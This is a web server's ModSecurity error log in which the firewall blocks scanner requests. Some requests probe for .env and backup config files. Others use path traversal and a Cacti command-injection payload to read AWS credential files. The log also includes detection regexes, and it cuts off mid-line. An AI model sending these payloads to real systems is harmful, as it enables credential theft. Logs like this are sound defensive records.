[Sat Jun 07 07:35:38.582886 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEPPqp11M0k3qkbFlHbjuwAAAAQ"]
[Sat Jun 07 07:35:38.583131 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEPPqp11M0k3qkbFlHbjuwAAAAQ"]
[Sat Jun 07 07:35:38.583290 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aEPPqp11M0k3qkbFlHbjuwAAAAQ"]
[Sat Jun 07 07:35:38.605301 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEPPqp11M0k3qkbFlHbjvAAAAAQ"]
[Sat Jun 07 07:35:38.605507 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEPPqp11M0k3qkbFlHbjvAAAAAQ"]
[Sat Jun 07 07:35:38.605674 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aEPPqp11M0k3qkbFlHbjvAAAAAQ"]
[Sat Jun 07 07:35:38.627568 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEPPqp11M0k3qkbFlHbjvQAAAAQ"]
[Sat Jun 07 07:35:38.627717 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEPPqp11M0k3qkbFlHbjvQAAAAQ"]
[Sat Jun 07 07:35:38.627912 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEPPqp11M0k3qkbFlHbjvQAAAAQ"]
[Sat Jun 07 07:35:38.628072 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aEPPqp11M0k3qkbFlHbjvQAAAAQ"]
[Sat Jun 07 07:35:38.650052 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEPPqp11M0k3qkbFlHbjvgAAAAQ"]
[Sat Jun 07 07:35:38.650282 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEPPqp11M0k3qkbFlHbjvgAAAAQ"]
[Sat Jun 07 07:35:38.650481 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aEPPqp11M0k3qkbFlHbjvgAAAAQ"]
[Sat Jun 07 07:35:38.752179 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEPPqp11M0k3qkbFlHbjwQAAAAQ"]
[Sat Jun 07 07:35:38.752397 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEPPqp11M0k3qkbFlHbjwQAAAAQ"]
[Sat Jun 07 07:35:38.752545 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aEPPqp11M0k3qkbFlHbjwQAAAAQ"]
[Sat Jun 07 07:35:38.972630 2025] [authz_core:error] [pid 3688254] [client 185.177.72.204:22618] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Sat Jun 07 07:35:39.112256 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEPPq511M0k3qkbFlHbjywAAAAQ"]
[Sat Jun 07 07:35:39.112517 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEPPq511M0k3qkbFlHbjywAAAAQ"]
[Sat Jun 07 07:35:39.112682 2025] [:error] [pid 3688254] [client 185.177.72.204:22618] [client 185.177.72.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aEPPq511M0k3qkbFlHbjywAAAAQ"]
[Sat Jun 07 07:35:39.365333 2025] [authz_core:error] [pid 3688254] [client 185.177.72.204:22618] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Sun Jun 08 02:26:05.895663 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYnRa8k0A1fnYogFi4NAAAAAQ"]
[Sun Jun 08 02:26:05.895731 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYnRa8k0A1fnYogFi4NAAAAAQ"]
[Sun Jun 08 02:26:05.895772 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYnRa8k0A1fnYogFi4NAAAAAQ"]
[Sun Jun 08 02:26:05.896381 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYnRa8k0A1fnYogFi4NAAAAAQ"]
[Sun Jun 08 02:26:05.896586 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYnRa8k0A1fnYogFi4NAAAAAQ"]
[Sun Jun 08 02:26:10.484740 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYoha8k0A1fnYogFi4OAAAAAQ"]
[Sun Jun 08 02:26:10.484811 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYoha8k0A1fnYogFi4OAAAAAQ"]
[Sun Jun 08 02:26:10.484852 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYoha8k0A1fnYogFi4OAAAAAQ"]
[Sun Jun 08 02:26:10.484891 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1 cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "surf.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYoha8k0A1fnYogFi4OAAAAAQ"]
[Sun Jun 08 02:26:10.485029 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:l[\\\\\\\\'\\"]* ..." at ARGS:local_data_id. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "123"] [id "932100"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: ;cat ../../../../../../../root/.aws/credentials found within ARGS:local_data_id: 1;cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYoha8k0A1fnYogFi4OAAAAAQ"]
[Sun Jun 08 02:26:10.485622 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYoha8k0A1fnYogFi4OAAAAAQ"]
[Sun Jun 08 02:26:10.485827 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 25, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYoha8k0A1fnYogFi4OAAAAAQ"]
[Sun Jun 08 02:26:11.443513 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYoxa8k0A1fnYogFi4OQAAAAQ"]
[Sun Jun 08 02:26:11.443723 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYoxa8k0A1fnYogFi4OQAAAAQ"]
[Sun Jun 08 02:26:11.443917 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYoxa8k0A1fnYogFi4OQAAAAQ"]
[Sun Jun 08 02:26:12.199835 2025] [:error] [pid 3707674] [client 107.150.0.115:45432] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag 